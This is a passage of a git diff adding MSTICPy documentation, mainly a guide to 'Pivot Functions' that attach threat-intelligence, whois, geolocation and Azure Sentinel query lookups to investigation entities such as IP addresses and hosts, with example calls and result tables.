+| 20  | ipv4            | 1.2.3.4                                                                                              | 78           |
++-----+-----------------+------------------------------------------------------------------------------------------------------+--------------+
+| 21  | dns             | wscript.shell                                                                                        | 81           |
++-----+-----------------+------------------------------------------------------------------------------------------------------+--------------+
+| 22  | dns             | abc.com                                                                                              | 90           |
++-----+-----------------+------------------------------------------------------------------------------------------------------+--------------+
+| 23  | ipv4            | 127.0.0.1                                                                                            | 102          |
++-----+-----------------+------------------------------------------------------------------------------------------------------+--------------+
+| 24  | url             | \http://127.0.0.1/                                                                                   | 102          |
++-----+-----------------+------------------------------------------------------------------------------------------------------+--------------+
+| 25  | win_named_pipe  | \\.\pipe\blahtest"                                                                                   | 107          |
++-----+-----------------+------------------------------------------------------------------------------------------------------+--------------+
+
+.. note:: the URLs in the previous table have been altered to prevent
+   inadvertent navigation to them.
+
diff --git a/docs/source/data_analysis/PivotFunctions.rst b/docs/source/data_analysis/PivotFunctions.rst
new file mode 100644
index 000000000..f129360af
--- /dev/null
+++ b/docs/source/data_analysis/PivotFunctions.rst
@@ -0,0 +1,2257 @@
+Pivot Functions
+===============
+
+What are Pivot Functions?
+-------------------------
+
+*MSTICPy* has a lot of functionality distributed across many classes and
+modules. However, there is no simple way to discover where these
+functions are and what types of data the function is relevant to.
+
+Pivot functions bring this functionality together grouped around
+*Entities*. Entities are representations of real-world objects found
+commonly in CyberSec investigations.
+Some examples are: IpAddress, Host, Account, URL.
+
+The pivot functions are attached to the entities most relevant
+to that operation. E.g. IP geolocation lookup is a method of the
+IpAddress entity. The functions are also grouped into logical
+containers. You can see some examples here of functions being
+run on the IpAddress entity in the "util" group.
+
+.. parsed-literal::
+
+    >>> IpAddress.util.ip_type(ip_str="157.53.1.1"))
+    ip          result
+    157.53.1.1  Public
+
+
+    >>> IpAddress.util.whois("157.53.1.1"))
+    asn  asn_cidr  asn_country_code  asn_date    asn_description  asn_registry  nets .....
+    NA   NA        US                2015-04-01  NA               arin          [{'cidr': '157.53.0.0/16'...
+
+    >>> IpAddress.util.geoloc(value="157.53.1.1"))
+    CountryCode  CountryName    State   City   Longitude   Latitude   Asn...
+    US           United States  None    None   -97.822     37.751     None...
+
+This second example shows a pivot function that does a data query for host
+entities. The "list_host_logons" function is an AzureSentinel query.
+If you have queries for other environments such as Splunk or MDE, these
+appear in their own containers.
+
+.. parsed-literal::
+    >>> Host.AzureSentinel.list_host_logons(host_name="VictimPc")
+    Account               EventID   TimeGenerated                      Computer                 SubjectUserName   SubjectDomainName
+    NT AUTHORITY\SYSTEM   4624      2020-10-01 22:39:36.987000+00:00   VictimPc.Contoso.Azure   VictimPc$         CONTOSO
+    NT AUTHORITY\SYSTEM   4624      2020-10-01 22:39:37.220000+00:00   VictimPc.Contoso.Azure   VictimPc$         CONTOSO
+    NT AUTHORITY\SYSTEM   4624      2020-10-01 22:39:42.603000+00:00   VictimPc.Contoso.Azure   VictimPc$         CONTOSO
+
+
+
+You can also chain pivot functions together using pandas to create a processing
+pipeline that does multiple operations on data:
+
+.. code:: ipython3
+
+    >>> (
+            # take a list of IP Addresses
+            suspicious_ips_df
+            # Lookup IPs at VirusTotal
+            .mp_pivot.run(IpAddress.ti.lookup_ipv4_VirusTotal, column="IPAddress")
+            # Filter on high severity TI hits
+            .query("Severity == 'high'")
+            # Find who owns these IPs
+            .mp_pivot.run(IpAddress.util.whois, column="Ioc", join="left")
+            # Query IPs that have login attempts in our AAD
+            .mp_pivot.run(IpAddress.AzureSentinel.list_aad_signins_for_ip, ip_address_list="Ioc")
+            # Send the output of this to a plot
+            .mp_timeline.plot(
+                title="High Severity IPs with Logon attempts",
+                source_columns=["UserPrincipalName", "IPAddress", "ResultType", "ClientAppUsed", "UserAgent", "Location"],
+                group_by="UserPrincipalName"
+            )
+        )
+
+
+
+.. note:: We'll see many more examples of how to do these pivoting
+   operations later in the document.
+
+*MSTICPy* has had entity classes from the very early days but, until now,
+these have only been used sporadically in the rest of the package.
+
+The pivot functionality exposes operations relevant to a particular
+entity as methods (or functions) of that entity. These operations include:
+
+-  Data queries
+-  Threat intelligence lookups
+-  Other data lookups such as geo-location or domain resolution
+-  and other local functionality
+
+The pivot library essentially wraps these various functions in a
+more standardized form. This gives us several benefits:
+
+-  You can more easily find functions related to what you are
+   working on.
+-  You can discover functionality that you weren't previously
+   aware of.
+-  The functions have standarized input and output.
+-  The functions will take input data in a number of different
+   formats so you don't waste time wrangling data to suit the function
+   you want to use.
+-  For functions that require a time range (e.g. queries) the time
+   range is set centrally and used by all functions (you can change
+   the time range at any time, of course).
+
+
+What is "Pivoting"?
+-------------------
+
+The term comes from the common practice of Cyber investigators
+navigating between related entities. For example an entity/investigation
+chain might look like the following:
+
+==== ============ ==================== ===============================
+Step Source       Operation            Target
+==== ============ ==================== ===============================
+1    Alert        Review alert ->      Source IPs
+2    Source IPs   Lookup TI ->         Related URLs and Malware names
+3    URL          Query web logs ->    Requesting hosts
+4    Host         Query host logons -> Accounts
+==== ============ ==================== ===============================
+
+At each step there are one or more directions that you can take to
+follow the chain of related *indicators of activity* in a possible attack.
+
+Bringing these functions into a few, well-known locations makes it
+easier to use *MSTICPy* to carry out this common pivoting pattern in
+Jupyter notebooks.
+
+
+Getting started
+---------------
+
+The pivoting library depends on a number of data providers and other
+functions defined in
+*MSTICPy*. These normally need to be loaded and initialized before starting
+the Pivot library.
+
+1. Load *MSTICPy*
+~~~~~~~~~~~~~~~~~
+
+.. code:: ipython3
+
+    from msticpy.nbtools.nbinit import init_notebook
+    init_notebook(namespace=globals());
+
+
+2. Load one or more data providers
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+You can create as many data providers (for different data
+backends) as you need - pivot will search all of them for usable
+queries.
+
+.. note:: You do not have to authenticate to the data provider before
+   loading Pivot. However, some providers are populated with additional
+   queries only after connecting to the service. These dynamically-added
+   queries will not be added
+   to the pivot functions unless you authenticate/connect prior to creating
+   the new Pivot object (or create a new Pivot object).
+
+.. warning:: If you are working with multiple Azure Sentinel workspaces,
+   Pivot does not create multiple instances of pivot query functions for
+   each workspace. To switch workspaces, use the ``QueryProvider.connect()``
+   function to switch to your desired workspace. Pivot query functions
+   will now be executed against that workspace. If you have a need to
+   query multiple workspaces, let us know and we will try to implement
+   simultaneous workspace pivots.
+
+You don't have to explicity load providers such as Threat Intelligence (TILookup)
+and GeoIP. If you do not initialize these before starting Pivot they
+will be loaded with the defaults as specified in your
+*msticpyconfig.yaml*. If you want to use a specific configuration for
+any of these, you should load and configure them before starting Pivot.
+
+.. code:: ipython3
+
+    az_provider = QueryProvider("AzureSentinel")
+
+
+3. Initialize the Pivot library
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+See the next section.
+
+
+Initializing the Pivot library
+------------------------------
+
+You can either pass an explicit list of providers to Pivot or let it
+look for them in the notebook global namespace. In the latter case, the
+Pivot class will use the most recently-created instance of each that it
+finds.
+
+If you have data providers loaded that you do not want
+Pivot to use, pass an explicit list of provider objects when initializing
+the Pivot class. For more details see
+:py:mod:`Pivot<msticpy.datamodel.pivot>`.
+
+You will usually see some output as provider libraries are loaded.
+
+.. code:: ipython3
+
+    from msticpy.datamodel.pivot import Pivot
+    Pivot(namespace=globals())
+
+
+.. note:: Although you can assign the created Pivot object to a variable
+   you normally don’t need to do so. You can access the current Pivot
+   instance using the class attribute ``Pivot.current``
+
+
+What happens at initialization?
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+-  Any instantiated data providers are searched for relevant queries.
+   Any queries found are added to the approriate entity or entities.
+-  The TILookup provider is loaded and entity-specific lookups (e.g. IP, Url,
+   File) are added as pivot functions
+-  Miscellaneous *MSTICPy* functions and classes (e.g. GeoIP, IpType,
+   Domain utils) are added as pivot functions to the appropriate entity.
+-  A default time range is set - this is only used by queries executed
+   as pivot functions and covered later in `Data query pivot functions`_
+
+You can add additional functions as pivot functions by creating a
+registration template and importing the function. Details of this are
+covered later in `Customizing and managing Pivots`_.
+
+
+View the list of providers loaded by the Pivot class
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Notice that TILookup was loaded even though we did not create an
+instance of TILookup beforehand.
+
+.. code:: ipython3
+
+    Pivot.current.providers
+
+
+.. parsed-literal::
+
+    {'AzureSentinel': <msticpy.data.data_providers.QueryProvider at 0x2741dfd4408>,
+     'TILookup': <msticpy.sectools.tilookup.TILookup at 0x2741e114888>}
+
+
+
+After loading the Pivot class, entities have pivot functions added to them
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+.. code:: ipython3
+
+    print("Host pivot functions\n")
+    display(entities.Host.get_pivot_list())
+    print("\nIpAddress pivot functions\n")
+    display(entities.IpAddress.get_pivot_list())
+
+
+.. parsed-literal::
+
+    Host pivot functions
+
+    ['AzureSentinel.alerts',
+    'AzureSentinel.aznet_interface',
+    'AzureSentinel.aznet_net_flows',
+    'AzureSentinel.aznet_net_flows_depr',
+    'AzureSentinel.azsent_bookmarks',
+    'AzureSentinel.hb_heartbeat',
+    ...
+    'AzureSentinel.lxsys_squid_activity',
+    'AzureSentinel.lxsys_sudo_activity',
+    'AzureSentinel.lxsys_user_group_activity',
+    'AzureSentinel.lxsys_user_logon',
+    ...
+    'AzureSentinel.wevt_logons',
+    'AzureSentinel.wevt_parent_process',
+    'AzureSentinel.wevt_process_session',
+    'AzureSentinel.wevt_processes',
+    'dns_is_resolvable',
+    'dns_resolve',
+    'qry_alerts',
+    'qry_aznet_interface',
+    'qry_aznet_net_flows',
+    'qry_azsent_bookmarks',
+    ...
+    'qry_wevt_all_events',
+    'qry_wevt_events_by_id',
+    'qry_wevt_logon_attempts',
+    'qry_wevt_logon_failures',
+    ...
+    'util.dns_in_abuse_list',
+    'util.dns_is_resolvable',
+    'util.dns_resolve',
+    'util.dns_validate_tld']
+
+    IpAddress pivot functions
+
+    ['AzureSentinel.hb_heartbeat',
+    'AzureSentinel.hb_heartbeat_for_ip_depr',
+    'AzureSentinel.list_alerts_for_ip',
+    ...
+    'geoloc',
+    'ip_type',
+    'qry_aad_signins',
+    'qry_az_activity',
+    ...
+    'ti.lookup_ipv4_VirusTotal',
+    'ti.lookup_ipv4_XForce',
+    ...
+    'tilookup_ip',
+    'tilookup_ipv4',
+    'tilookup_ipv6',
+    'util.geoloc',]
+
+
+Reloading Pivots
+^^^^^^^^^^^^^^^^
+If you need to refresh the pivot functions because, for example, you loaded
+a query provider after initializing the Pivot library you can call
+:py:meth:`reload_pivots<msticpy.datamodel.pivot.Pivot.reload_pivots>`.
+This takes the same ``namespace`` and ``providers`` parameters as when
+initializing the class.
+You can also acheive the same thing by creating a new instance of the
+Pivot class.
+
+.. note:: Reloading will remove previously attached pivot functions.
+   This is usually a safe operation since these can be dynamically
+   created at any time. If you don't want to remove existing functions
+   use the ``no_clear=True`` parameter to ``reload_pivots``.
+
+
+Discovering entity names
+^^^^^^^^^^^^^^^^^^^^^^^^
+
+The entities module has a utility names `find_entity`. You
+can use that to verify the name of an entity.
+
+.. code:: ipython3
+
+    entities.find_entity("dns")
+
+.. parsed-literal::
+
+    Match found 'Dns'
+
+    msticpy.datamodel.entities.dns.Dns
+
+If a unique match is found the entity class is returned. Otherwise,
+we try to suggest possible matches for the entity name.
+
+.. code:: ipython3
+
+    entities.find_entity("azure")
+
+.. parsed-literal::
+
+    No exact match found for 'azure'.
+    Closest matches are 'AzureResource', 'Url', 'Malware'
+
+
+Pivot functions are grouped into containers
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Data queries are grouped into a container with the name of the data
+provider to which they belong. E.g. AzureSentinel queries are in a
+container of that name, Splunk queries would be in a “Splunk” container.
+
+TI lookups are put into a "ti" container.
+
+All other built-in functions are added to the "util" container, by default.
+
+The containers themselves are callable and will return a list of their
+contents.
+
+.. code:: ipython3
+
+    entities.Host.AzureSentinel()
+
+
+.. parsed-literal::
+
+    list_related_alerts function
+    az_net_analytics function
+    get_info_by_hostname function
+    auditd_all function
+    ...
+
+Containers are also iterable - each iteration returns a tuple
+(pair) of name/function values.
+
+
+.. code:: ipython3
+
+    [query for query, _ in entities.Host.AzureSentinel if "logon" in query]
+
+
+.. parsed-literal::
+
+    ['user_logon',
+     'list_logons_for_host',
+     'list_host_logon_failures',
+     'get_host_logon',
+     'list_host_logons',
+     'list_all_logons_by_host']
+
+
+In notebooks/IPython you can also use tab completion to get to the right
+function.
+
+Shortcut pivot functions
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+A subset of many regularly-used pivot functions are also added
+as "shortcuts" to the entities. These are not in containers but
+available as direct methods on the entity classes and entity instances.
+A shortcut is just a reference or pointer to a pivot function in
+one of the containers described in the previous section.
+
+Because the shortcut methods behave as *instance* methods they can take input
+values from the entity attributes directly. In this example, the input to
+the ``ip_type`` function is automatically taken from the ``Address``
+attribute of the IP entity.
+
+.. code:: ipython3
+
+    >>> ip = IpAddress(Address="192.168.1.1")
+    >>> ip.ip_type()
+    ip          result
+    192.168.1.1 Private
+
+These shortcuts otherwise work in the same way as the pivot functions
+described in the rest of the document. In the previous example showing
+pivot functions with the ``get_pivot_list()`` function, the shortcut
+versions of the pivot functions appear without a "." in the name.
+
+To help you navigate which shortcut does what, data query shortcuts are prefixed
+with "qry\_" and threat intelligence lookups with "ti\_".
+
+You can create your own shortcut methods to existing or custom pivot functions
+as described in `Creating and deleting shortcut pivot functions`_.
+
+
+Using the Pivot Browser
+~~~~~~~~~~~~~~~~~~~~~~~
+
+Pivot also has a utility that allows you to browse entities and the
+pivot functions attached to them. You can search for functions with
+desired keywords, view help for the specific function and copy the function
+signature to paste into a code cell. Both fully-qualified pivot functions
+and shortcut equivalents are shown in the browser.
+
+.. code:: ipython3
+
+    Pivot.browse()
+
+.. figure:: _static/pivot_browser.png
+   :alt: Pivot function browser.
+
+
+Running a pivot function
+------------------------
+
+Pivot functions support a variety of input parameter types. They can be
+used with the following types of parameters:
+
+-  entity instances (e.g. where you have an *IpAddress* entity with a
+   populated ``Address`` field)
+-  single values (e.g. a string with DNS domain name)
+-  lists of values (e.g. a list of IpAddresses)
+-  pandas DataFrames (where one or more of the columns contains the
+   input parameter data that you want to use)
+
+Pivot functions normally return results as a dataframe (although some
+complex functions such as Notebooklets can return composite result
+objects containing multiple dataframes and other object types).
+
+Pivot functions retain their original documentation string (i.e. the
+docstring of the function before it was wrapped) so you can lookup
+help on a pivot function at any time using the builtin Python help()
+function or a trailing "?"
+
+
+.. note:: Most examples in the document use entity classes has been
+   imported individually (``from msticpy.datamodel.entities import Host``).
+   This is done to make the examples syntax cleaner. However, you do not need to
+   import each entity class individually before using it. The ``init_notebook``
+   function described in the `Getting Started`_ section imports the "entities"
+   parent module, which contains the individual entity classes. You can run
+   ``from msticpy.datamodel import entities`` to do the same.
+   This means that you can use any entity by prefixing it with ``entities.``
+   (e.g. ``entities.Host()`` - create a host entity or
+   ``entities.Account.util.my_pivot()`` - run the Account entity ``my_pivot``
+   function ). Using the entities module prefix like this is usually much more
+   convenient than seperate import statements for each entity.
+
+
+.. code:: ipython3
+
+    from msticpy.datamodel.entities import IpAddress
+    IpAddress.util.ip_type?
+
+.. parsed-literal::
+
+    Signature: IpAddress.util.ip_type(ip: str = None, ip_str: str = None)
+    Docstring:
+    Validate value is an IP address and deteremine IPType category.
+
+    (IPAddress category is e.g. Private/Public/Multicast).
+
+    Parameters
+    ----------
+    ip_str : str
+        The string of the IP Address
+
+    Returns
+    -------
+    str
+        Returns ip type string using ip address module
+
+
+Specifying Parameter names
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+There are a few variations in the way you can specify parameters:
+
+-  Positional parameter - If the function only accepts one parameter you
+   can usually just supply it without a name - as a *positional parameter*
+   (see first and third examples in the code sample in the next section)
+-  Native parameter - You can also use the native parameter name -
+   i.e. the name that the underlying function expects and that will be
+   shown in the ``help(function)`` output. (second example below)
+-  Generic parameter - You can also use the generic parameter name
+   “value” in most cases. (fourth example)
+
+.. note:: There are some exceptions to the use of generic parameters
+   like "column" and "value". These are called out later
+   in this document.
+
+If in doubt, use ``help(entity.container.func)`` or ``entity.container.func?``
+to find the specific parameter(s) that the function expects.
+
+.. note:: Most of the examples in the following sections use the **IpAddress**
+   entity to it easier to compare the different ways of calling pivot functions.
+   The same patterns apply to all other entities (Account, Host, Dns, Url, etc.)
+   that have pivot functions.
+
+
+Using single value parameters as input
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+
+Some examples of simple pivot functions for an IpAddress string.
+
+.. code:: ipython3
+
+    display(IpAddress.util.ip_type("10.1.1.1"))
+    display(IpAddress.util.ip_type(ip_str="157.53.1.1"))
+    display(IpAddress.util.whois("157.53.1.1"))
+    display(IpAddress.util.geoloc(value="157.53.1.1"))
+
+
+========  ========
+ip        result
+========  ========
+10.1.1.1  Private
+========  ========
+
+==========  ========
+ip          result
+==========  ========
+157.53.1.1  Public
+==========  ========
+
+===========  ================  =========================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================
+ip_column    AsnDescription    whois_result
+===========  ================  =========================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================
+157.53.1.1   NA                {'nir': None, 'asn_registry': 'arin', 'asn': 'NA', 'asn_cidr': 'NA', 'asn_country_code': 'US', 'asn_date': '2015-04-01', 'asn_description': 'NA', 'query': '157.53.1.1', 'nets': [{'cidr': '157.53.0.0/16', 'name': 'NETACTUATE-MDN-04', 'handle': 'NET-157-53-0-0-1', 'range': '157.53.0.0 - 157.53.255.255', 'description': 'NetActuate, Inc', 'country': 'US', 'state': 'NC', 'city': 'Raleigh', 'address': 'PO Box 10713', 'postal_code': '27605', 'emails': ['ops@netactuate.com', 'abuse@netactuate.com'], 'created': '2015-04-01', 'updated': '2016-10-25'}], 'raw': None, 'referral': None, 'raw_referral': None}
+===========  ================  =========================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================
+
+=============  =============  =======  ======  ===========  ==========  =====  =======  ===========  ================  ===========
+CountryCode    CountryName    State    City      Longitude    Latitude  Asn    edges    Type         AdditionalData    IpAddress
+=============  =============  =======  ======  ===========  ==========  =====  =======  ===========  ================  ===========
+US             United States                       -97.822      37.751         set()    geolocation  {}                157.53.1.1
+=============  =============  =======  ======  ===========  ==========  =====  =======  ===========  ================  ===========
+
+
+Using an entity as a parameter
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Behind the scenes the Pivot API use a mapping of entity attributes
+to supply the right value to the function parameter. This is not
+always foolproof but usually works.
+
+Here, we're
+creating two IpAddress entities and initializing them with their ``Address``
+values. Then we supply these entities as parameters to the pivot functions.
+
+.. code:: ipython3
+
+    ip1 = IpAddress(Address="10.1.1.1")
+    ip2 = IpAddress(Address="157.53.1.1")
+
+    display(IpAddress.util.ip_type(ip1))
+    display(IpAddress.util.ip_type(ip2))
+    display(IpAddress.util.whois(ip2))
+    display(IpAddress.util.geoloc(ip2))
+
+The output is the same as the previous example
+`Using single value parameters as input`_
+
+
+For shortcut functions you can also use the entity instance to
+provide the input value:
+
+.. code:: ipython3
+
+    ip_1 = IpAddress(Address="10.1.1.1")
+    ip_2 = IpAddress(Address="157.53.1.1")
+    display(ip_1.ip_type())
+    display(ip_2.whois())
+
+========  ========
+ip        result
+========  ========
+10.1.1.1  Private
+========  ========
+
+===========  ================  =========================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================
+ip_column    AsnDescription    whois_result
+===========  ================  =========================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================
+157.53.1.1   NA                {'nir': None, 'asn_registry': 'arin', 'asn': 'NA', 'asn_cidr': 'NA', 'asn_country_code': 'US', 'asn_date': '2015-04-01', 'asn_description': 'NA', 'query': '157.53.1.1', 'nets': [{'cidr': '157.53.0.0/16', 'name': 'NETACTUATE-MDN-04', 'handle': 'NET-157-53-0-0-1', 'range': '157.53.0.0 - 157.53.255.255', 'description': 'NetActuate, Inc', 'country': 'US', 'state': 'NC', 'city': 'Raleigh', 'address': 'PO Box 10713', 'postal_code': '27605', 'emails': ['ops@netactuate.com', 'abuse@netactuate.com'], 'created': '2015-04-01', 'updated': '2016-10-25'}], 'raw': None, 'referral': None, 'raw_referral': None}
+===========  ================  =========================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================
+
+
+
+Using a list (or other iterable) as a parameter
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Many of the underlying *MSTICPy* functions (the functions wrapped by the Pivot
+library) accept either single values or
+collections of values (usually in DataFrames) as input.
+
+Using single-valued input functions when you have a list of values to
+process can be messy. Functions that require dataframe input can also
+take a bit of preparation time if the data you want to use isn't
+already in a dataframe. In either case you usually need to build
+some glue code to handle the formatting and calling the function
+multiple times.
+
+The pivot library tries to smooth this path so that you do not have to
+worry about how the original function was built to handle input.
+In cases
+where the underlying function does not accept iterables as parameters,
+the Pivot library will iterate through each value in your input list,
+calling the function and
+collating the results to hand you back a single dataframe.
+
+.. note:: Not all *MSTICPy* pivot functions are configured to allow
+   iterated calling. This is usually where the
+   underlying function is long-running or expensive and we've opted to
+   block accepting iterated calls. Notebooklets are an example of functions
+   that will not work with iterable or dataframe input.
+
+Similarly, where the function expects a dataframe or iterable as an
+input, you can supply a simple string value and the pivot interface
+will convert to the expected input type (in this case a single-column,
+single-row DataFrame).
+
+
+For functions with multiple input parameters you can supply a mixture of
+iterables and single values. In these cases, the single-valued parameters
+are re-used on each call,
+paired with the item in the list(s) taken from the multi-valued
+parameters.
+
+You can also use multiple iterables for multiple parameters. In this
+case the iterables *should* be the same length. If they are different
+lengths the iterations stop after the shortest list/iterable is
+exhausted.
+
+For example:
+
+::
+
+     list_1 = [1, 2, 3, 4]
+     list_2 = ["a", "b", "c"]
+     entity.util.func(p1=list_1, p2=list_2)
+
+The function will execute with the pairings (1, “a”), (2, “b”) and (3,
+"c) - (4, \_) will be ignored
+
+That may all sound a little confusing but, in practice, you should not
+need to worry about the mechanics of how the pivot library works.
+
+
+This is an example of using the same pivot functions shown previously,
+but now with list inputs.
+
+.. code:: ipython3
+
+    ip_list1 = ip_df1.AllExtIPs.values[-6:]
+
+    display(IpAddress.util.ip_type(ip_list1))
+    display(IpAddress.util.ip_type(ip_str=list(ip_list1)))
+    display(IpAddress.util.whois(value=tuple(ip_list1)))
+    display(IpAddress.util.geoloc(ip_list1))
+
+
+===============  ========
+ip               result
+===============  ========
+23.96.64.84      Public
+65.55.44.108     Public
+131.107.147.209  Public
+10.0.3.4         Private
+10.0.3.5         Private
+===============  ========
+
+===============  ========
+ip               result
+===============  ========
+23.96.64.84      Public
+65.55.44.108     Public
+131.107.147.209  Public
+10.0.3.4         Private
+10.0.3.5         Private
+===============  ========
+
+=====  ==============  =====  ==============  ==================  ==========  ===============================  ===============  ===============================================================================================================================================================================================================================================================================================================================================================================================================  =====  ==========  ==============
+  nir  asn_registry      asn  asn_cidr        asn_country_code    asn_date    asn_description                  query            nets                                                                                                                                                                                                                                                                                                                                                                                                               raw    referral    raw_referral
+=====  ==============  =====  ==============  ==================  ==========  ===============================  ===============  ===============================================================================================================================================================================================================================================================================================================================================================================================================  =====  ==========  ==============
+  nan  arin             8075  23.96.0.0/14    US                  2013-06-18  MICROSOFT-CORP-MSN-AS-BLOCK, US  23.96.64.84      [{'cidr': '23.96.0.0/13', 'name': 'MSFT', 'handle': 'NET-23-96-0-0-1', 'range': '23.96.0.0 - 23.103.255.255', 'description': 'Microsoft Corporation', 'country': 'US', 'state': 'WA', 'city': 'Redmond', 'address': 'One Microsoft Way', 'postal_code': '98052', 'emails': ['msndcc@microsoft.com', 'IOC@microsoft.com', 'abuse@microsoft.com'], 'created': '2013-06-18', 'updated': '2013-06-18'}]                nan         nan             nan
+  nan  arin             8075  65.52.0.0/14    US                  2001-02-14  MICROSOFT-CORP-MSN-AS-BLOCK, US  65.55.44.108     [{'cidr': '65.52.0.0/14', 'name': 'MICROSOFT-1BLK', 'handle': 'NET-65-52-0-0-1', 'range': '65.52.0.0 - 65.55.255.255', 'description': 'Microsoft Corporation', 'country': 'US', 'state': 'WA', 'city': 'Redmond', 'address': 'One Microsoft Way', 'postal_code': '98052', 'emails': ['msndcc@microsoft.com', 'IOC@microsoft.com', 'abuse@microsoft.com'], 'created': '2001-02-14', 'updated': '2013-08-20'}]       nan         nan             nan
+  nan  arin             3598  131.107.0.0/16  US                  1988-11-11  MICROSOFT-CORP-AS, US            131.107.147.209  [{'cidr': '131.107.0.0/16', 'name': 'MICROSOFT', 'handle': 'NET-131-107-0-0-1', 'range': '131.107.0.0 - 131.107.255.255', 'description': 'Microsoft Corporation', 'country': 'US', 'state': 'WA', 'city': 'Redmond', 'address': 'One Microsoft Way', 'postal_code': '98052', 'emails': ['msndcc@microsoft.com', 'IOC@microsoft.com', 'abuse@microsoft.com'], 'created': '1988-11-11', 'updated': '2013-08-20'}]    nan         nan             nan
+  nan  nan               nan  nan             nan                 nan         nan                              nan              nan                                                                                                                                                                                                                                                                                                                                                                                                                nan         nan             nan
+  nan  nan               nan  nan             nan                 nan         nan                              nan              nan                                                                                                                                                                                                                                                                                                                                                                                                                nan         nan             nan
+=====  ==============  =====  ==============  ==================  ==========  ===============================  ===============  ===============================================================================================================================================================================================================================================================================================================================================================================================================  =====  ==========  ==============
+
+=============  =============  ==========  ==========  ===========  ==========  =====  =======  ===========  ================  ===============
+CountryCode    CountryName    State       City          Longitude    Latitude  Asn    edges    Type         AdditionalData    IpAddress
+=============  =============  ==========  ==========  ===========  ==========  =====  =======  ===========  ================  ===============
+US             United States  Virginia    Washington     -78.1539     38.7095         set()    geolocation  {}                23.96.64.84
+US             United States  Virginia    Boydton        -78.375      36.6534         set()    geolocation  {}                65.55.44.108
+US             United States  Washington  Redmond       -122.126      47.6722         set()    geolocation  {}                131.107.147.209
+US             United States  Virginia    Washington     -78.1539     38.7095         set()    geolocation  {}                13.82.152.48
+=============  =============  ==========  ==========  ===========  ==========  =====  =======  ===========  ================  ===============
+
+
+Using DataFrames as input
+~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Using a dataframe as input requires a slightly different syntax since
+you not only need to pass the dataframe as a parameter but also tell the
+function which column to use for input.
+
+To specify the column to use, you can use the name of the parameter that
+the underlying function expects or one of these generic names:
+
+-  column
+-  input_column
+-  input_col
+-  src_column
+-  src_col
+
+
+.. note:: These generic names are not shown in the function help: they
+   are just a convenience so that you don't need to remember what the
+   names of the underlying function parameters are.
+
+Examples showing the same pivot functions with dataframe inputs.
+
+.. code:: ipython3
+
+    display(IpAddress.util.ip_type(data=ip_df1, input_col="AllExtIPs"))
+    display(IpAddress.util.ip_type(data=ip_df1, ip="AllExtIPs"))
+    display(IpAddress.util.whois(data=ip_df1, column="AllExtIPs"))
+    display(IpAddress.util.geoloc(data=ip_df1, src_col="AllExtIPs"))
+
+
+Output is the same as `Using a list (or other iterable) as a parameter`_
+
+
+Aside - converting text to a dataframe
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The pivot library includes a convenience IPython magic for times when
+you just have raw text (e.g. something pasted from a Threat Intel report).
+You can use this to convert raw, structured text into a form that you
+can send to a pivot function.
+
+.. code:: ipython3
+
+    from msticpy.datamodel import txt_df_magic
+
+Here, we paste in the text into a cell, add the cell magic ``%%txt2df``
+at the top of the cell with parameters
+telling it that the first row is a head row and that we want it to
+create a named pandas DataFrame in the notebook global namespace.
+(This just means that when you execute this cell it will create
+a DataFrame variable named "ip_df1" that you can use in subsequent
+cells).
+
+Use ``%%txt2df --help`` to see the supported usage.
+
+.. code:: ipython3
+
+    %%txt2df --headers --name ip_df1
+    AllExtIPs
+    9, 172.217.15.99
+    10, 40.85.232.64
+    11, 20.38.98.100
+    12, 23.96.64.84
+    13, 65.55.44.108
+
+
+====  =============
+       AllExtIPs
+====  =============
+  9   172.217.15.99
+ 10   40.85.232.64
+ 11   20.38.98.100
+ 12   23.96.64.84
+ 13   65.55.44.108
+====  =============
+
+
+
+Joining input to output data
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+You might want to return a data set that is joined to your input set. To
+do that use the “join” parameter. Join works with all types of inputs:
+value, list or DataFrame.
+
+The value of join can be one of the following:
+
+-  inner
+-  left
+-  right
+-  outer
+
+To preserve all rows from the input, use a “left” join. To keep only
+rows that have a valid result from the function use “inner” or “right”
+
+   Note while most functions only return a single output row for each
+   input row, some return multiple rows. Be cautious using “outer” in
+   these cases.
+
+.. code:: ipython3
+
+    display(IpAddress.util.geoloc(data=ip_df1, src_col="AllExtIPs", join="left"))
+
+
+=============  =============  =============  ========  ==========  ===========  ==========  =====  =======  ===========  ================  =============
+AllExtIPs      CountryCode    CountryName    State     City          Longitude    Latitude  Asn    edges    Type         AdditionalData    IpAddress
+=============  =============  =============  ========  ==========  ===========  ==========  =====  =======  ===========  ================  =============
+172.217.15.99  US             United States                           -97.822      37.751          set()    geolocation  {}                172.217.15.99
+40.85.232.64   CA             Canada         Ontario   Toronto        -79.4195     43.6644         set()    geolocation  {}                40.85.232.64
+20.38.98.100   US             United States  Virginia  Washington     -78.1539     38.7095         set()    geolocation  {}                20.38.98.100
+23.96.64.84    US             United States  Virginia  Washington     -78.1539     38.7095         set()    geolocation  {}                23.96.64.84
+65.55.44.108   US             United States  Virginia  Boydton        -78.375      36.6534         set()    geolocation  {}                65.55.44.108
+=============  =============  =============  ========  ==========  ===========  ==========  =====  =======  ===========  ================  =============
+
+By default, the pivot functions will infer the join keys for input and output data
